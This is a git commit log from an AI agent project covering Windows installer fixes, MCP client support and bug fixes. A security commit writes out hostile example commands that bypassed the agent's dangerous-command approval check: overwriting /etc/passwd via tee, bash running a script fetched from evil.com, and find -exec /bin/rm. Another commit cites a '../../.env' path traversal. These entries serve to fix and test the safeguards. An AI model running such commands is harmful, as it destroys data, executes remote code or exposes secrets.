The ZIP update preserves venv/, node_modules/, .git/, and .env,
reinstalls Python deps via uv, and syncs bundled skills.

Also adds -c windows.appendAtomically=false to all git commands in
the update path for systems where git works but atomic writes fail.
2026-03-02 23:00:22 -08:00
teknium1
4766b3cdb9 fix: fall back to ZIP download when git clone fails on Windows
Git for Windows can completely fail to write files during clone due to
antivirus software, Windows Defender Controlled Folder Access, or NTFS
filter drivers. Even with windows.appendAtomically=false, the checkout
phase fails with 'unable to create file: Invalid argument'.

New install strategy (3 attempts):
1. git clone with -c windows.appendAtomically=false (SSH then HTTPS)
2. If clone fails: download GitHub ZIP archive, extract with
   Expand-Archive (Windows native, no git file I/O), then git init
   the result for future updates
3. All git commands now use -c flag to inject the atomic write fix

Also passes -c flag on update path (fetch/checkout/pull) and makes
submodule init failure non-fatal with a warning.
2026-03-02 22:53:28 -08:00
teknium1
354af6ccee chore: remove unnecessary migration code from install.ps1
No existing Windows installations to migrate from.
2026-03-02 22:51:36 -08:00
teknium1
c9afbbac0b feat: install to %LOCALAPPDATA%\hermes on Windows
Move Windows install location from ~\.hermes (user profile root) to
%LOCALAPPDATA%\hermes (C:\Users\<user>\AppData\Local\hermes).

The user profile directory is prone to issues from OneDrive sync,
Windows Defender Controlled Folder Access, and NTFS filter drivers
that break git's atomic file operations. %LOCALAPPDATA% is the
standard Windows location for per-user app data (used by VS Code,
Discord, etc.) and avoids these issues.

Changes:
- Default HermesHome to $env:LOCALAPPDATA\hermes
- Set HERMES_HOME user env var so Python code finds the new location
- Auto-migrate existing ~\.hermes installations on first run
- Update completion message to show actual paths
2026-03-02 22:49:22 -08:00
teknium1
83fa442c1b fix: use env vars for git windows.appendAtomically on Windows
The previous fix set git config --global before clone, but on systems
where atomic writes are broken (OneDrive, antivirus, NTFS filter
drivers), even writing ~/.gitconfig fails with 'Invalid argument'.

Fix: inject the config via GIT_CONFIG_COUNT/KEY/VALUE environment
variables, which git reads before performing any file I/O. This
bypasses the chicken-and-egg problem where git can't write the config
file that would fix its file-writing issue.
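The installer itself is PowerShell; the same env-injection shape in
Python, for illustration (clone URL and destination are placeholders):

    import os, subprocess

    # git reads GIT_CONFIG_COUNT/GIT_CONFIG_KEY_n/GIT_CONFIG_VALUE_n
    # before doing any file I/O, so the setting takes effect even
    # when ~/.gitconfig itself cannot be written.
    env = dict(os.environ,
               GIT_CONFIG_COUNT="1",
               GIT_CONFIG_KEY_0="windows.appendAtomically",
               GIT_CONFIG_VALUE_0="false")
    subprocess.run(["git", "clone", "https://github.com/owner/repo", "dest"],
                   env=env, check=True)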
2026-03-02 22:47:04 -08:00
teknium1
1900e5238b fix: git clone fails on Windows with 'copy-fd: Invalid argument'
Git for Windows can fail during clone when copying hook template files
from the system templates directory. The error:

  fatal: cannot copy '.../templates/hooks/fsmonitor-watchman.sample'
         to '.git/hooks/...': Invalid argument

The script already set windows.appendAtomically=false but only AFTER
clone, which is too late since clone itself triggers the error.

Fix:
- Set git config --global windows.appendAtomically false BEFORE clone
- Add a third fallback: clone with --template='' to skip hook template
  copying entirely (they're optional .sample files)
2026-03-02 22:39:57 -08:00
teknium1
ddae1aa2e9 fix: install.ps1 exits entire PowerShell window when run via iex
When running via 'irm ... | iex', the script executes in the caller's
session scope. The 'exit 1' calls (lines 424, 460, 849-851) would kill
the entire PowerShell window instead of just stopping the script.

Fix:
- Replace all 'exit 1' with 'throw' for proper error propagation
- Wrap Main() call in try/catch so errors are caught and displayed
  with a helpful message instead of silently closing the terminal
- Show fallback instructions to download and run as a .ps1 file
  if the piped install keeps failing
2026-03-02 22:38:31 -08:00
teknium1
16274d5a82 fix: Windows git 'unable to write loose object' + venv pip path
- Set 'git config windows.appendAtomically false' in hermes update
  command (win32 only) and in install.ps1 after cloning. Fixes the
  'fatal: unable to write loose object file: Invalid argument' error
  on Windows filesystems.
- Fix venv pip fallback path: Scripts/pip on Windows vs bin/pip on Unix
- Gate .env encoding fix behind _IS_WINDOWS (no change to Linux/macOS)
2026-03-02 22:31:42 -08:00
teknium1
5749f5809c fix: explicit UTF-8 encoding for .env file operations (Windows only)
On Windows, open() without explicit encoding uses the system locale
(cp1252/etc.), which can cause OSError errno 22 'Invalid argument'
when reading/writing the UTF-8 .env file.

Fix: gate encoding kwargs behind _IS_WINDOWS check so Linux/macOS
code paths are completely unchanged. Only Windows gets explicit
encoding='utf-8' on load_env() and save_env_value().
2026-03-02 22:29:11 -08:00
BathreeNode
d10108f8ca fix: rename misspelled directory 'fouth-edition' to 'fourth-edition'
The ECMA schema directory was misspelled as 'fouth-edition'
instead of 'fourth-edition'. Renamed all 4 files within to
correct the path:

- opc-contentTypes.xsd
- opc-coreProperties.xsd
- opc-digSig.xsd
- opc-relationships.xsd
2026-03-03 09:21:28 +03:00
BathreeNode
8b520f9848 fix: rename misspelled directory 'fouth-edition' to 'fourth-edition'
The ECMA schema directory was misspelled as 'fouth-edition'
instead of 'fourth-edition'. Renamed all 4 files within to
correct the path:

- opc-contentTypes.xsd
- opc-coreProperties.xsd
- opc-digSig.xsd
- opc-relationships.xsd
2026-03-03 09:20:47 +03:00
teknium1
4cc431afab fix: setup wizard skipping provider selection on fresh install
The is_existing check included 'get_config_path().exists()' which is
always True after installation (the installer copies config.yaml from
the template). This caused the wizard to enter quick mode, which
skips provider selection entirely — leaving hermes non-functional.

Fix: only consider it an existing installation when an actual
inference provider is configured (OPENROUTER_API_KEY, OPENAI_BASE_URL,
or an active OAuth provider). Fresh installs now correctly show the
full setup flow with provider selection.
2026-03-02 22:20:45 -08:00
BathreeNode
a718aed1be fix: rename misspelled directory 'fouth-edition' to 'fourth-edition'
The ECMA schema directory was misspelled as 'fouth-edition'
instead of 'fourth-edition'. Renamed all 4 files within to
correct the path:

- opc-contentTypes.xsd
- opc-coreProperties.xsd
- opc-digSig.xsd
- opc-relationships.xsd
2026-03-03 09:20:07 +03:00
BathreeNode
5f29e7b63c fix: rename misspelled directory 'fouth-edition' to 'fourth-edition'
The ECMA schema directory was misspelled as 'fouth-edition'
instead of 'fourth-edition'. Renamed all 4 files within to
correct the path:

- opc-contentTypes.xsd
- opc-coreProperties.xsd
- opc-digSig.xsd
- opc-relationships.xsd
2026-03-03 09:17:13 +03:00
teknium1
245c766512 fix: remove 2>&1 from git commands in PowerShell installer
Root cause: PowerShell with $ErrorActionPreference = 'Stop' only
creates NativeCommandError from stderr when you CAPTURE it via 2>&1.
Without the redirect, stderr flows directly to the console and
PowerShell never intercepts it.

This is how OpenClaw's install.ps1 handles it — bare git commands
with no stderr redirection. Wrap SSH clone attempt in try/catch
since it's expected to fail (falls back to HTTPS).
2026-03-02 22:14:18 -08:00
BathreeNode
f08ad94d4d fix: correct typo 'Grup' -> 'Group' in test section headers
Three section header comments in tests/test_run_agent.py used
'Grup' instead of 'Group':

- Line 124: # Grup 1: Pure Functions
- Line 276: # Grup 2: State / Structure Methods
- Line 572: # Grup 3: Conversation Loop Pieces (OpenAI mock)
2026-03-03 09:10:35 +03:00
teknium1
cdf5375b9a fix: PowerShell NativeCommandError on git stderr output
PowerShell with $ErrorActionPreference = 'Stop' treats ANY stderr
output from native commands as a terminating NativeCommandError —
even successful git operations that write progress to stderr
(e.g. 'Cloning into ...').

Fix: temporarily set $ErrorActionPreference = 'Continue' around all
git commands (clone, fetch, checkout, pull, submodule update). This
lets git run normally while preserving strict error handling for
the rest of the installer.
2026-03-02 22:10:31 -08:00
teknium1
bdf4758510 fix: show uv error on Python install failure, add fallback detection
The Windows installer was swallowing uv python install errors with
| Out-Null, making failures impossible to diagnose. Now:

- Shows the actual uv error output when installation fails
- Falls back to finding any existing Python 3.10-3.13 on the system
- Falls back to system python if available
- Shows helpful manual install instructions (python.org URL + winget)
2026-03-02 22:06:26 -08:00
teknium1
84e45b5c40 feat: tabbed platform installer on landing page
Add an interactive OS selector widget to the hero section and install
steps, inspired by OpenClaw's install UI:

- macOS-style window chrome with red/yellow/green dots
- Three clickable tabs: Linux/macOS, PowerShell, CMD
- Command text, shell prompt, and note update on tab click
- Auto-detects visitor's OS and selects the right tab on page load
- Install steps section also gets synced platform tabs
- Simplified Windows note section (tabs above now cover all platforms)
- Fully responsive — icons hidden on mobile, tabs wrap properly
2026-03-02 22:03:43 -08:00
teknium1
daedec6957 fix: Telegram adapter crash on Windows when library not installed (#304)
The ImportError fallback set ContextTypes = Any, but then
ContextTypes.DEFAULT_TYPE was used as a type annotation at class
definition time — Any doesn't have .DEFAULT_TYPE, causing AttributeError.

Fix: create a _MockContextTypes class with DEFAULT_TYPE = Any.
Also stub CommandHandler, TelegramMessageHandler, filters, ParseMode,
and ChatType to prevent potential NameErrors.
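
The shape of the fix, per the description above:

  from typing import Any

  try:
      from telegram.ext import ContextTypes
  except ImportError:
      class _MockContextTypes:
          # Any has no .DEFAULT_TYPE attribute, so the bare Any fallback
          # crashed at class-definition time; this stub keeps the
          # annotation resolvable when the library is absent.
          DEFAULT_TYPE = Any

      ContextTypes = _MockContextTypes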

Fixes #304.
2026-03-02 22:03:36 -08:00
teknium1
de59d91add feat: Windows native support via Git Bash
- Add scripts/install.cmd batch wrapper for CMD users (delegates to install.ps1)
- Add _find_shell() in local.py: detects Git Bash on Windows via
  HERMES_GIT_BASH_PATH env var, shutil.which, or common install paths
  (same pattern as Claude Code's CLAUDE_CODE_GIT_BASH_PATH)
- Use _find_shell() in process_registry.py for background processes
- Fix hermes_cli/gateway.py: use wmic instead of ps aux on Windows,
  skip SIGKILL (doesn't exist on Windows), fix venv path
  (Scripts/python.exe vs bin/python)
- Update README with three install commands (Linux/macOS, PowerShell, CMD)
  and Windows native documentation

Requires Git for Windows, which bundles bash.exe. The terminal tool
transparently uses Git Bash for shell commands regardless of whether
the user launched hermes from PowerShell or CMD.
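
A sketch of the detection order (the hardcoded candidate paths here
are illustrative):

  import os
  import shutil

  def _find_shell():
      # 1) explicit override, 2) PATH lookup, 3) common install paths
      override = os.environ.get("HERMES_GIT_BASH_PATH")
      if override and os.path.exists(override):
          return override
      found = shutil.which("bash")
      if found:
          return found
      for candidate in (
          r"C:\Program Files\Git\bin\bash.exe",
          r"C:\Program Files (x86)\Git\bin\bash.exe",
      ):
          if os.path.exists(candidate):
              return candidate
      return None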
2026-03-02 22:03:29 -08:00
Teknium
68cc81a74d Merge pull request #301 from NousResearch/feat/mcp-support
feat(mcp): Native MCP client with HTTP transport, reconnection, and security
2026-03-02 21:32:43 -08:00
teknium1
3ead3401e0 fix(mcp): persist updated tools to session log immediately after reload
After /reload-mcp updates self.agent.tools, immediately call
_persist_session() so the session JSON file at ~/.hermes/sessions/
reflects the new tools list. Without this, the tools field in the
session log would only update on the next conversation turn — if
the user quit after reloading, the log would have stale tools.
2026-03-02 21:31:23 -08:00
teknium1
eec31b0089 fix(mcp): /reload-mcp now updates agent tools + injects history message
- CLI: After reload, refreshes self.agent.tools and valid_tool_names
  so the model sees updated tools on its next API call
- Both CLI and Gateway: Appends a [SYSTEM: ...] message at the END
  of conversation history explaining what changed (added/removed/
  reconnected servers, tool count). This preserves prompt-cache for
  the system prompt and earlier messages — only the tail changes.
- Gateway already creates a new AIAgent per message so tools refresh
  naturally; the injected message provides context for the model
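
Sketch of the tail injection (message role and wording are
illustrative):

  def _inject_reload_notice(history: list, added, removed, tool_count) -> None:
      # Appending at the END keeps the system prompt and all earlier
      # messages byte-identical, so provider prompt caching stays warm.
      history.append({
          "role": "user",  # role choice here is illustrative
          "content": (
              f"[SYSTEM: MCP reload: added {added}, removed {removed}; "
              f"{tool_count} tools now available]"
          ),
      })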
2026-03-02 19:25:06 -08:00
teknium1
7df14227a9 feat(mcp): banner integration, /reload-mcp command, resources & prompts
Banner integration:
- MCP Servers section in CLI startup banner between Tools and Skills
- Shows each server with transport type, tool count, connection status
- Failed servers shown in red; section hidden when no MCP configured
- Summary line includes MCP server count
- Removed raw print() calls from discovery (banner handles display)

/reload-mcp command:
- New slash command in both CLI and gateway
- Disconnects all MCP servers, re-reads config.yaml, reconnects
- Reports what changed (added/removed/reconnected servers)
- Allows adding/removing MCP servers without restarting

Resources & Prompts support:
- 4 utility tools registered per server: list_resources, read_resource,
  list_prompts, get_prompt
- Exposes MCP Resources (data sources) and Prompts (templates) as tools
- Proper parameter schemas (uri for read_resource, name for get_prompt)
- Handles text and binary resource content
- 23 new tests covering schemas, handlers, and registration

Test coverage: 74 MCP tests total, 1186 tests pass overall.
2026-03-02 19:15:59 -08:00
teknium1
60effcfc44 fix(mcp): parallel discovery, user-visible logging, config validation
- Discovery is now parallel (asyncio.gather) instead of sequential,
  fixing the 60s shared timeout issue with multiple servers
- Startup messages use print() so users see connection status even
  with default log levels (the 'tools' logger is set to ERROR)
- Summary line shows total tools and failed servers count
- Validate conflicting config: warn if both 'url' and 'command' are
  present (HTTP takes precedence)
- Update TODO.md: mark MCP as implemented, list remaining work
- Add test for conflicting config detection (51 tests total)

All 1163 tests pass.
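
The parallel discovery is essentially the following (connect_server
is a stand-in for the real per-server coroutine):

  import asyncio

  async def connect_server(name: str, cfg: dict):
      ...  # stand-in for the real per-server connect + tool listing

  async def discover_all(servers: dict):
      # Connect to every configured server concurrently; one slow server
      # no longer burns the shared timeout budget for the rest.
      return await asyncio.gather(
          *(connect_server(name, cfg) for name, cfg in servers.items()),
          return_exceptions=True,
      )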
2026-03-02 19:02:28 -08:00
teknium1
63f5e14c69 docs: add comprehensive MCP documentation and examples
- docs/mcp.md: Full MCP documentation covering prerequisites, configuration,
  transports (stdio + HTTP), security (env filtering, credential stripping),
  reconnection, troubleshooting, popular servers, and advanced usage
- README.md: Add MCP section with quick config example and install instructions
- cli-config.yaml.example: Add commented mcp_servers section with examples
  for stdio, HTTP, and authenticated server configs
- docs/tools.md: Add MCP to Tool Categories table and MCP Tools section
- skills/mcp/native-mcp/SKILL.md: Create native MCP client skill with
  full configuration reference, transport types, security, troubleshooting
- skills/mcp/DESCRIPTION.md: Update category description to cover both
  native MCP client and mcporter bridge approaches
2026-03-02 18:52:33 -08:00
teknium1
64ff8f065b feat(mcp): add HTTP transport, reconnection, security hardening
Upgrades the MCP client implementation from PR #291 with:

- HTTP/Streamable HTTP transport: support 'url' key in config for remote
  MCP servers (Notion, Slack, Sentry, Supabase, etc.)
- Automatic reconnection with exponential backoff (1s-60s, 5 retries)
  when a server connection drops unexpectedly
- Environment variable filtering: only pass safe vars (PATH, HOME, etc.)
  plus user-specified env to stdio subprocesses (prevents secret leaks)
- Credential stripping: sanitize error messages before returning to the
  LLM (strips GitHub PATs, OpenAI keys, Bearer tokens, etc.)
- Configurable per-server timeouts: 'timeout' and 'connect_timeout' keys
- Fix shutdown race condition in servers_snapshot variable scoping

Test coverage: 50 tests (up from 30), including new tests for env
filtering, credential sanitization, HTTP config detection, reconnection
logic, and configurable timeouts.

All 1162 tests pass (1162 passed, 3 skipped, 0 failed).
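
For illustration, credential stripping amounts to something like this
(the patterns shown are a small, approximate subset):

  import re

  _SECRET_PATTERNS = [
      re.compile(r"ghp_[A-Za-z0-9]{36}"),    # GitHub PAT (classic)
      re.compile(r"sk-[A-Za-z0-9_-]{20,}"),  # OpenAI-style key
      re.compile(r"Bearer\s+\S+"),           # Bearer tokens
  ]

  def sanitize_error(message: str) -> str:
      # Scrub secrets from error text before it reaches the LLM.
      for pattern in _SECRET_PATTERNS:
          message = pattern.sub("[REDACTED]", message)
      return message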
2026-03-02 18:40:03 -08:00
teknium1
468b7fdbad Merge PR #291: feat: add MCP (Model Context Protocol) client support
Authored by 0xbyt4. Adds MCP client with official SDK, direct tool registration,
auto-injection into hermes-* toolsets, and graceful degradation.
2026-03-02 18:24:31 -08:00
teknium1
14b0ad95c6 docs: enhance WhatsApp setup instructions and introduce mode selection
Updated the README and messaging docs to cover the two WhatsApp integration modes: 'bot' mode (recommended) and 'self-chat' mode. Clarified setup instructions for configuration, allowlist management, and dependency installation; adjusted CLI commands to match; and updated the WhatsApp bridge to support mode selection.

2026-03-02 17:51:33 -08:00
teknium1
221e4228ec Merge PR #295: fix: resolve OPENROUTER_API_KEY before OPENAI_API_KEY in all code paths
Authored by 0xbyt4. Fixes #289.
2026-03-02 17:29:25 -08:00
teknium1
dd9d3f89b9 Merge PR #286: Fix ClawHub Skills Hub adapter for API endpoint changes
Authored by BP602. Fixes #285.
2026-03-02 17:25:14 -08:00
teknium1
b0cce17da6 Merge PR #284: fix(cli): throttle UI invalidate to prevent terminal blinking on SSH
Authored by ygd58. Fixes #282.
2026-03-02 17:17:54 -08:00
teknium1
c6b3b8c847 docs: add VISION.md brainstorming/roadmap doc
Initial vision board with voice mode feature exploration, CLI UX design,
gateway platform ideas, and open questions.
2026-03-02 17:15:30 -08:00
teknium1
2ba87a10b0 Merge PR #219: fix: guard POSIX-only process functions for Windows compatibility
Authored by Farukest. Fixes #218.
2026-03-02 17:07:49 -08:00
aydnOktay
5fa3e24b76 Make process_registry checkpoint writes atomic 2026-03-03 02:44:01 +03:00
aydnOktay
ac6d747fa6 Make batch_runner checkpoint incremental and atomic 2026-03-03 01:43:07 +03:00
alireza78a
ee541c84f1 fix(cron): close lock_fd on failed flock to prevent fd leak 2026-03-03 02:09:56 +03:30
0xbyt4
6053236158 fix: prioritize OPENROUTER_API_KEY over OPENAI_API_KEY
When both OPENROUTER_API_KEY and OPENAI_API_KEY are set (e.g. OPENAI_API_KEY
in .bashrc), the wrong key was sent to OpenRouter causing auth failures.

Fixed key resolution order in cli.py and runtime_provider.py.
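
The corrected resolution order, in essence:

  import os

  def resolve_api_key():
      # OPENROUTER_API_KEY wins when both are set; OPENAI_API_KEY is
      # often exported globally (e.g. in .bashrc) and would otherwise
      # shadow it.
      return os.environ.get("OPENROUTER_API_KEY") or os.environ.get("OPENAI_API_KEY")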

Fixes #289
2026-03-03 00:28:26 +03:00
0xbyt4
11615014a4 fix: eliminate shell noise from terminal output with fence markers
- Wrap commands with unique fence markers (printf FENCE; cmd; printf FENCE)
  to isolate real output from shell init/exit noise (oh-my-zsh, macOS
  session restore/save, docker plugin errors, etc.)
- Expand _clean_shell_noise to cover zsh/macOS patterns and strip from
  both beginning and end (fallback when fences are missing)
- Fix BSD find compatibility: fallback to simple find when -printf
  produces empty output (macOS)
- Fix test_terminal_disk_usage: use sys.modules to get the real module
  instead of the shadowed function from tools/__init__.py
- Add 13 new unit tests for fence extraction and zsh noise patterns
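
The fence idea, sketched (fence format and helper names are
illustrative):

  import uuid

  def wrap_with_fences(cmd: str):
      fence = f"__HERMES_FENCE_{uuid.uuid4().hex}__"
      # Shell init/exit noise lands outside the two fence lines.
      return fence, f"printf '%s\\n' '{fence}'; {cmd}; printf '%s\\n' '{fence}'"

  def extract_between_fences(output: str, fence: str) -> str:
      parts = output.split(fence)
      # The fence appears twice on success; fall back to raw output otherwise.
      return parts[1].strip("\n") if len(parts) >= 3 else output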
2026-03-02 22:53:21 +03:00
Daniel Sateler
3588396263 feat(whatsapp): native media sending — images, videos, documents
Add a /send-media endpoint to the WhatsApp bridge and corresponding
adapter methods so the agent can send files as native WhatsApp
attachments instead of plain-text URLs/paths.

- bridge.js: new POST /send-media endpoint using Baileys' native
  image/video/document/audio message types with MIME detection
- base.py: add send_video(), send_document(), send_image_file()
  with text fallbacks; route MEDIA: tags by file extension instead
  of always treating them as voice messages
- whatsapp.py: implement all media methods via a shared
  _send_media_to_bridge() helper; override send_image() to download
  URLs to local cache and send as native photos
- prompt_builder.py: update WhatsApp and Telegram platform hints so
  the agent knows it can use MEDIA:/path tags to send native media
2026-03-02 16:34:49 -03:00
0xbyt4
11a2ecb936 fix: resolve thread safety issues and shutdown deadlock in MCP client
- Add threading.Lock protecting all shared state (_servers, _mcp_loop, _mcp_thread)
- Fix deadlock in shutdown_mcp_servers: _stop_mcp_loop was called inside
  a _lock block but also acquires _lock (non-reentrant)
- Fix race condition in _ensure_mcp_loop with concurrent callers
- Change idempotency to per-server (retry failed servers, skip connected)
- Dynamic toolset injection via startswith("hermes-") instead of hardcoded list
- Parallel shutdown via asyncio.gather instead of sequential loop
- Add tests for partial failure retry, parallel shutdown, dynamic injection
2026-03-02 22:08:32 +03:00
0xbyt4
151e8d896c fix(tests): isolate discover_mcp_tools tests from global _servers state
Patch _servers to empty dict in tests that call discover_mcp_tools()
with mocked config, preventing interference from real MCP connections
that may exist when running within the full test suite.
2026-03-02 21:38:01 +03:00
0xbyt4
593c549bc4 fix: make discover_mcp_tools idempotent to prevent duplicate connections
When discover_mcp_tools() is called multiple times (e.g. direct call
then model_tools import), return existing tool names instead of opening
new connections that would orphan the previous ones.
2026-03-02 21:34:21 +03:00
0xbyt4
aa2ecaef29 fix: resolve orphan subprocess leak on MCP server shutdown
Refactor MCP connections from AsyncExitStack to task-per-server
architecture. Each server now runs as a long-lived asyncio Task
with `async with stdio_client(...)`, ensuring anyio cancel-scope
cleanup happens in the same Task that opened the connection.
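
Schematically (assuming the MCP SDK's stdio_client; the exact import
path varies by SDK version):

  import asyncio
  from mcp.client.stdio import stdio_client  # assumed import path

  async def server_task(params, stop: asyncio.Event):
      # Open and close the connection inside ONE task, so anyio's
      # cancel-scope cleanup runs in the task that created it.
      async with stdio_client(params) as (read, write):
          await stop.wait()  # hold the connection until shutdown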
2026-03-02 21:22:00 +03:00
0xbyt4
0eb0bec74c feat(gateway): add MCP server shutdown on gateway exit
Ensures MCP subprocess connections are closed when the messaging
gateway shuts down, preventing orphan processes.
2026-03-02 21:06:17 +03:00
0xbyt4
3c252ae44b feat: add MCP (Model Context Protocol) client support
Connect to external MCP servers via stdio transport, discover their tools
at startup, and register them into the hermes-agent tool registry.

- New tools/mcp_tool.py: config loading, server connection via background
  event loop, tool handler factories, discovery, and graceful shutdown
- model_tools.py: trigger MCP discovery after built-in tool imports
- cli.py: call shutdown_mcp_servers in _run_cleanup
- pyproject.toml: add mcp>=1.2.0 as optional dependency
- 27 unit tests covering config, schema conversion, handlers, registration,
  SDK interaction, toolset injection, graceful fallback, and shutdown

Config format (in ~/.hermes/config.yaml):
  mcp_servers:
    filesystem:
      command: "npx"
      args: ["-y", "@modelcontextprotocol/server-filesystem", "/tmp"]
2026-03-02 21:03:14 +03:00
BP602
6789084ec0 Fix ClawHub Skills Hub adapter for updated API 2026-03-02 16:11:49 +01:00
ygd58
b603b6e1c9 fix(cli): throttle UI invalidate to prevent terminal blinking on SSH 2026-03-02 16:00:12 +01:00
teknium1
3c13feed4c feat: show detailed tool call args in gateway based on config
Issue #263: Telegram/Discord/WhatsApp/Slack now show tool call details
based on display.tool_progress in config.yaml.

Changes:
- gateway/run.py: 'verbose' mode shows full args (keys + JSON, 200 char
  max). 'all' mode preview increased from 40 to 80 chars. Added missing
  tool emojis (execute_code, delegate_task, clarify, skill_manage,
  search_files).
- agent/display.py: Added execute_code, delegate_task, clarify,
  skill_manage to primary_args. Added 'code' and 'goal' to fallback keys.
- run_agent.py: Pass function_args dict to tool_progress_callback so
  gateway can format based on its own verbosity config.

Config usage:
  display:
    tool_progress: verbose  # off | new | all | verbose
2026-03-02 05:23:15 -08:00
teknium1
7652afb8de Merge PR #243: fix(honcho): auto-enable when API key is present
Authored by Bartok9. Fixes #241.
2026-03-02 05:13:33 -08:00
teknium1
7862e7010c test: add additional multiline bypass tests for find patterns
Extra test coverage for newline bypass detection (DOTALL fix).
Inspired by Bartok9's PR #245.
2026-03-02 04:46:27 -08:00
teknium1
4faf2a6cf4 Merge PR #233: fix(security): add re.DOTALL to prevent multiline bypass of dangerous command detection
Authored by Farukest. Fixes #232.
2026-03-02 04:44:06 -08:00
teknium1
8c48bb080f refactor: remove unnecessary single-element loop in disk usage calc
The 'for pattern in [f"hermes-*{task_id[:8]}*"]' was a loop over a
single-element list — just use a plain variable instead.
2026-03-02 04:40:13 -08:00
teknium1
6d2481ee5c Merge PR #231: fix: use task-specific glob pattern in disk usage calculation
Authored by Farukest. Fixes #230.
2026-03-02 04:38:58 -08:00
teknium1
ca5525bcd7 fix(tests): isolate HERMES_HOME in tests and adjust log directory for debug session
Added a fixture to redirect HERMES_HOME to a temporary directory during tests, preventing writes to the user's home directory. Updated the test for DebugSession to create a dedicated log directory for saving logs, ensuring test isolation and accuracy in assertions.
2026-03-02 04:34:21 -08:00
teknium1
56b53bff6e Merge PR #229: fix(agent): copy conversation_history to avoid mutating caller's list
Authored by Farukest. Fixes #228.

# Conflicts:
#	tests/test_run_agent.py
2026-03-02 04:21:39 -08:00
Dogila Developer
fd335a4e26 fix: add missing dangerous command patterns in approval.py
Three attack vectors bypassed the dangerous command detection system:

1. tee writes to sensitive paths (/etc/, /dev/sd, .ssh/, .hermes/.env)
were not detected. tee writes to files just like > but was absent
from DANGEROUS_PATTERNS.
Example: echo 'evil' | tee /etc/passwd

2. curl/wget via process substitution bypassed the pipe-to-shell check.
The existing pattern only matched curl ... | bash but not
bash <(curl ...) which is equally dangerous.
Example: bash <(curl http://evil.com/install.sh)

3. find -exec with full-path rm (e.g. /bin/rm, /usr/bin/rm) was not
caught. The pattern only matched bare rm, not absolute paths.
Example: find . -exec /bin/rm {} \;
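
Approximate patterns for the three gaps (illustrative; the real
DANGEROUS_PATTERNS entries are broader):

  import re

  NEW_PATTERNS = [
      # 1. tee into sensitive paths
      re.compile(r"\btee\s+(?:-a\s+)?(?:/etc/|/dev/sd|\.ssh/|\.hermes/\.env)"),
      # 2. pipe-to-shell via process substitution
      re.compile(r"\b(?:ba|z)?sh\s+<\(\s*(?:curl|wget)\b"),
      # 3. find -exec with an absolute-path rm
      re.compile(r"\bfind\b.*-exec\s+/\S*/rm\b", re.DOTALL),
  ]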
2026-03-02 14:46:20 +03:00
teknium1
c4ea996612 fix: repair flush sentinel test — mock auxiliary client and add guard
The TestFlushSentinelNotLeaked test from PR #227 had two issues:
1. flush_memories() uses get_text_auxiliary_client() which could bypass
   agent.client entirely — mock it to return (None, None)
2. No assertion that the API was actually called — added guard assert

Without these fixes the test passed vacuously (API never called).
2026-03-02 03:21:08 -08:00
teknium1
39bfd226b8 Merge PR #225: fix: preserve empty content in ReadResult.to_dict()
Authored by Farukest. Fixes #224.
2026-03-02 03:13:31 -08:00
teknium1
234b67f5fd fix: mock time in retry exhaustion tests to prevent backoff sleep
The TestRetryExhaustion tests from PR #223 didn't mock time.sleep/time.time,
causing the retry backoff loops (275s+ total) to run in real time. Tests would
time out instead of running quickly.

Added _make_fast_time_mock() helper that creates a mock time module where
time.time() advances 500s per call (so sleep_end is always in the past) and
time.sleep() is a no-op. Both tests now complete in <1s.
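
The helper is roughly:

  from unittest import mock

  def _make_fast_time_mock():
      # time.time() jumps 500s per call, so any sleep deadline computed
      # from it is already in the past; time.sleep() is a no-op.
      fake_time = mock.MagicMock()
      clock = {"now": 0.0}

      def _tick():
          clock["now"] += 500.0
          return clock["now"]

      fake_time.time.side_effect = _tick
      fake_time.sleep.side_effect = lambda _s: None
      return fake_time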
2026-03-02 02:59:41 -08:00
teknium1
e27e3a4f8a Merge PR #223: fix: correct off-by-one in retry exhaustion checks
Authored by Farukest. Fixes #222.
2026-03-02 02:54:10 -08:00
teknium1
7a11ff95a9 Merge PR #277: fix: handle None message content across codebase
Fixes #276. Replace msg.get('content', '') with msg.get('content') or ''
in 4 vulnerable message-processing paths.
2026-03-02 02:42:35 -08:00
teknium1
33ab5cec82 fix: handle None message content across codebase (fixes #276)
The OpenAI API returns content: null on assistant messages with tool
calls. msg.get('content', '') returns None when the key exists with
value None, causing TypeError on len(), string concatenation, and
.strip() in downstream code paths.

Fixed 4 locations that process conversation messages:
- agent/auxiliary_client.py:84 — None passed to API calls
- cli.py:1288 — crash on content[:200] and len(content)
- run_agent.py:3444 — crash on None.strip()
- honcho_integration/session.py:445 — 'None' rendered in transcript

13 other instances were verified safe (already protected, only process
user/tool messages, or use the safe pattern).

Pattern: msg.get('content', '') → msg.get('content') or ''

Fixes #276
2026-03-02 02:23:53 -08:00
teknium1
1cb2311bad fix(security): block path traversal in skill_view file_path (fixes #220)
skill_view accepted arbitrary file_path values like '../../.env' and
would read files outside the skill directory, exposing API keys and
other sensitive data.

Added two layers of defense:
1. Reject paths with '..' components (fast, catches obvious traversal)
2. resolve() containment check with trailing '/' to prevent prefix
   collisions (catches symlinks and edge cases)
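
The two layers in sketch form:

  from pathlib import Path

  def resolve_in_skill_dir(skill_dir: Path, file_path: str) -> Path:
      # Layer 1: obvious traversal, rejected before touching the filesystem.
      if ".." in Path(file_path).parts:
          raise ValueError("path traversal rejected")
      resolved = (skill_dir / file_path).resolve()
      # Layer 2: containment after resolve() catches symlink tricks; the
      # trailing '/' stops /skills/foo from matching /skills/foobar.
      if not str(resolved).startswith(str(skill_dir.resolve()) + "/"):
          raise ValueError("path escapes skill directory")
      return resolved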

Fix approach from PR #242 (@Bartok9). Vulnerability reported by
@Farukest (#220, PR #221). Tests rewritten to properly mock SKILLS_DIR.

Closes #220
2026-03-02 02:00:09 -08:00
teknium1
25c65bc99e fix(agent): handle None content in context compressor (fixes #211)
The OpenAI API returns content: null on assistant messages that only
contain tool calls. msg.get('content', '') returns None (not '') when
the key exists with value None, causing TypeError on len() and string
concatenation in _generate_summary and compress.

Fix: msg.get('content') or '' — handles both missing keys and None.

Tests from PR #216 (@Farukest). Fix also in PR #215 (@cutepawss).
Both PRs had stale branches and couldn't be merged directly.

Closes #211
2026-03-02 01:35:52 -08:00
teknium1
afb680b50d fix(cli): fix max_turns comment and test for correct priority order
Priority is: CLI arg > config file > env var > default
(not env var > config file as the old comment stated)

The test failed because config.yaml had max_turns at both root level
and inside agent section. The test cleared agent.max_turns but the
root-level value still took precedence over the env var. Fixed the
test to clear both, and corrected the comment to match the intended
priority order.
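
The intended chain, as a sketch:

  def resolve_max_turns(cli_arg, config_value, env_value, default):
      # Priority: CLI arg > config file > env var > default
      for candidate in (cli_arg, config_value, env_value):
          if candidate is not None:
              return int(candidate)
      return default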
